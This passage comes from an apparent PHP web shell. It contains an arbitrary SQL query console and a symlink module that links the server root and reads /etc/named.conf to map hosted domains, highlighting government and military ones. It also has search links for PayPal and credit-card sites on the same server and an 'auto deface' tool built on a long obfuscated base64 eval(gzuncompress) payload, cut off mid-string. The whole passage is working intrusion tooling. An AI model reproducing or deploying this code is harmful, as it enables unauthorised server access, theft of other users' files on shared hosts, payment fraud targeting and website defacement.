  760.         $conexion = mysql_connect($_GET['host'], $_GET['usuario'], $_GET['password']) or die("<h1>Error</h1>");
  761.         mysql_select_db($_GET['condb']);
  762.         if (isset($_POST['mostrar'])) {
  763.             if (!empty($_POST['sentencia'])) {
  764.                 $resultado = mysql_query($_POST['sentencia']);
  765.             } else {
  766.                 $resultado = mysql_query("SELECT * FROM " . $_GET['entertable']);
  767.             }
  768.             $numer = 0;
  769.             echo '<div id="menu">Query : <a href="">';
  770.             echo $_POST['sentencia'];
  771.             echo '</a></div><br>';
  772.             echo "<table class='explore'>";
  773.             for ($i = 0;$i < mysql_num_fields($resultado);$i++) {
  774.                 echo "<th style='background:darkred;color:white;'>" . mysql_field_name($resultado, $i) . "</th>";
  775.                 $numer++;
  776.             }
  777.             while ($dat = mysql_fetch_row($resultado)) {
  778.                 echo "<tr>";
  779.                 foreach($dat as $val) {
  780.                     echo "<td class=main>" . $val . "</td>";
  781.                 }
  782.             }
  783.             echo "</tr></table>";
  784.         }
  785.  
  786. ?>
  787.  
  788. <?php
  789.     }
  790. //symlink
  791.      elseif(isset($_GET['beby']) && ($_GET['beby'] == 'symlink')) {  
  792.      echo " <form action= method=post>";
  793.  @set_time_limit(0);
  794.  echo "<center>";
  795.  @mkdir('sym',0777);
  796. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "<br><br><font color='green'>Cant access this file on server -> [ /etc/named.conf ]</font></center>"; } else { echo "<table width='700' border='0' cellpadding='3' cellspacing='1' align='center'><td style='background:darkred;color:white;'>Domains</td><td style='background:darkred;color:white;'>Users</td><td style='background:darkred;color:white;'>Symlink </td>"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])) { $name = "<font color=red>".$string[1][0].'</font>'; } echo " <tr> <td><a target=_blank href=http://www.".$string[1][0].'/>'.$name.' </a>  </td> <td style=border-left:1px solid white;> '.$UID['name']." </td> <td style=border-left:1px solid white;> <a href=sym/root/home/".$UID['name']."/public_html target=_blank>Symlink </a> </td> </tr>"; flush(); } } } } echo "</center></table>";
  797. }
  798. ?>
  799.  
  800. <?php
  801. //reverse IP lookup
  802.   if(isset($_GET['beby']) && ($_GET['beby'] == 'reverse'))
  803. {
  804. ?>
  805. <br><br><br>
  806. <center><div id="sitelist"><a onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>"><div id='menu'> DNS Reverse IP </a></center>
  807. <br><br>
  808. <center><div id="sitelist"><a onClick="window.open('http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+paypal','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+paypal"><div id='menu'> Paypal On Server </a></center>
  809. <br><br>
  810. <center><div id="visa"><a onClick="window.open('http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+visa+master','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+visa+master"><div id='menu'> CC On Server </a></center>
  811.  
  812.  <?php
  813.  }
  814. //tools for you
  815.     if(isset($_GET['beby']) && ($_GET['beby'] == 'tools'))
  816. {
  817.    echo'<center><br><br>
  818. <tr><form method="post" action="">&nbsp;<td>
  819. <select name="pilihan" id="pilih">
  820. <option value="db">DataBase [Mysql Adminer]</option>
  821. <option value="phini">Bypass php.ini</option>
  822. </select>
  823. <input  type="submit" name="submites" value=" >> ">
  824. </td></form>';
  825. //starting
  826. error_reporting(0);
  827. set_time_limit(0);
  828. $submit = $_POST ['submites'];
  829. if(isset($submit)) {
  830.     $pilih = $_POST['pilihan'];
  831. //auto deface      
  832.     if ( $pilih == 'db') {
  833.         $script = "PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXREdGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3REdaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZ